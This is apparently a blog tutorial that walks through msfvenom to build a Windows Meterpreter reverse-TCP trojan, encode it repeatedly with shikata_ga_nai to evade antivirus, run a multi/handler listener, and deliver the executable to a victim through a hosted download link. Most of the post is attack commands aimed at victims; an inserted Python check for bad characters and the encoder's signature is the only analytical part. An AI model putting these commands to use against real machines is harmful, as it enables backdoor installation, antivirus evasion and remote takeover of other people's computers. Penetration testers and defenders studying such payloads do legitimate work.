Hello and welcome to my blog. This post covers one of the most useful Metasploit tools: msfvenom. As you know, msfpayload was used to create payloads (generally called trojans or backdoors) and msfencode was used to encode payloads to avoid antivirus detection; you can read about both in my old post Creating Trojan Horse (Encoded) By Using Msfpayload. Both msfpayload and msfencode were removed from the Metasploit Framework on June 8th 2015.
So what replaces them?
The answer is msfvenom.
In this article I will cover what msfvenom is, how to use it, how to generate and encode a payload with it, how to avoid bad characters, and how to start a multi/handler listener to receive the connection from the trojan backdoor.
What is msfvenom?
In simple words, msfvenom is a combination of msfpayload and msfencode: it is used both to generate payloads and to encode them. You no longer need to run two different commands to create a payload and encode it. msfvenom ships with Metasploit by default, so there is no extra package to install. For more detail about Metasploit see https://www.metasploit.com/, and for tutorials read my Metasploit guide section.
Metasploit's command line interface msfconsole and the GUI Armitage are preinstalled in the current version of Kali Linux, Kali 2016.2. I will describe the tutorial using Kali Linux.
Let’s start using MSFvenom
In Kali Linux, right-click on the desktop and choose Open Terminal. In the new terminal window, type the following commands.
How to generate a payload using MSFvenom
To generate a payload, two switches must be used: -p and -f. -p selects the payload and -f selects the output file format. You should first decide which payload you are going to use. To print the list of available payloads, use -l:
#msfvenom -l payloads
After selecting the appropriate payload, use the following command:
#msfvenom -p <payload> -f <file format>
For example, to write the output as a Windows executable to a path of your choice:
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH
The final command would be:
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe
Before executing the final command you should know about the options the payload needs. The payload in the command above is meant to give a connection back to the attacker, but as written it will not send that connection back, because the payload options are not specified yet. So you must know the available options for windows/meterpreter/reverse_tcp. Use the following command to list them:
#msfvenom --payload-options -p <payload>
Now the code is
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > /root/Desktop/trojan.exe
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe > /root/Desktop/trojan.exe
The good news is that your payload is ready: you can send this payload to the victim's machine, and when the victim executes the file the attacker gets a session. But this payload is well known and most antivirus products are aware of it; antivirus will easily detect this file and remove it. So what is next?
You can do the following things:
- Avoid the bad character
- Encode the payload
How to avoid bad characters in the payload by using msfvenom
As you have seen in the msfvenom help menu, the -b flag is used to avoid certain bad characters in the payload. When the -b switch is used, msfvenom finds a suitable encoder, encodes the payload and avoids the bad characters automatically:
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -b '\x00' -f exe > /root/Desktop/trojan.exe
How to encode a payload by msfvenom
When you use the -b flag, the payload is encoded automatically with a suitable encoder. If you still want to use a specific encoder, use -e [encoder name]. Only the encoders available in msfvenom can be used, so first use the following command to list them:
#msfvenom -l encoders
Your final command will be:
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -f exe > /root/Desktop/trojan.exe
Use -i to set the number of times the payload is encoded (here, five iterations):
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe
Specify the architecture and platform of the payload with msfvenom
Use -a <x64/x86> to define the architecture and --platform for the platform, but first check the platforms available in Metasploit.
#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe
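The -b and -e sections above describe what the encoder is supposed to achieve; this added Python check (my example, not part of the original post or of Metasploit) verifies it on a payload written with -f raw: it confirms that none of the bytes listed with -b survived, and it flags the fnstenv GetPC stub that the x86/shikata_ga_nai decoder leaves in every output, which is exactly the kind of static signature antivirus engines key on. The sample bytes are constructed for the demonstration, not real msfvenom output.

```python
import re

# fnstenv [esp-0xc]: the GetPC instruction used by the x86/shikata_ga_nai
# decoder stub. Heuristic only; a real rule would also check the pop/xor/loop
# that follows, but this single instruction already survives -i iterations,
# which is why re-encoding alone does little against signature scanning.
SHIKATA_GETPC = b"\xd9\x74\x24\xf4"


def parse_badchars(spec: str) -> bytes:
    """Turn an msfvenom-style -b string such as '\\x00\\x0a' into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec))


def find_badchars(payload: bytes, badchars: bytes) -> list:
    """Return (offset, value) for every bad byte still present in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def find_shikata_stub(payload: bytes) -> int:
    """Offset of the fnstenv GetPC stub, or -1 when it is absent."""
    return payload.find(SHIKATA_GETPC)


def check_raw_payload(payload: bytes, badchar_spec: str) -> dict:
    """Summarise both checks the way a quick post-generation review would."""
    bad = find_badchars(payload, parse_badchars(badchar_spec))
    return {
        "badchars_present": bad,
        "shikata_stub_offset": find_shikata_stub(payload),
    }


# Constructed sample (not real msfvenom output): an FPU instruction (fldz),
# the GetPC stub, a pop, a small counter setup, then a body with a NUL byte.
SAMPLE = (b"\xd9\xee"            # fldz
          + SHIKATA_GETPC         # fnstenv [esp-0xc]
          + b"\x5b"               # pop ebx
          + b"\x31\xc9"           # xor ecx, ecx
          + b"\xb1\x10"           # mov cl, 0x10
          + b"\x00\xaa\xbb")      # constructed body containing a NUL (offset 11)

if __name__ == "__main__":
    # Real use: payload = open("/path/to/payload.raw", "rb").read()
    print(check_raw_payload(SAMPLE, r"\x00\x0a\x0d"))
```

A NUL reported after running with -b '\x00' means the bad-character request was not honoured, and a non-negative stub offset means the output is trivially fingerprintable regardless of how many -i iterations were used.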
Start a multi/handler listener on the attacker machine
The trojan will be executed on the victim's machine and will send a connection back to the attacker's machine, so the attacker must have a listener running. Start the multi/handler in msfconsole on the attacker machine as follows (the LHOST value is the attacker's IP):
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.56.100
msf > set LPORT 4444
msf > exploit
This is a very important phase. You have created trojan.exe and started the multi/handler listener; the next step is to deliver it to the victim machine. I started the apache2 web server, moved trojan.exe to /var/www/html, forwarded port 80 on the router to my attacker machine and sent the link http://AttackerIP/trojan.exe. When the victim downloads the trojan and executes it, the session is created.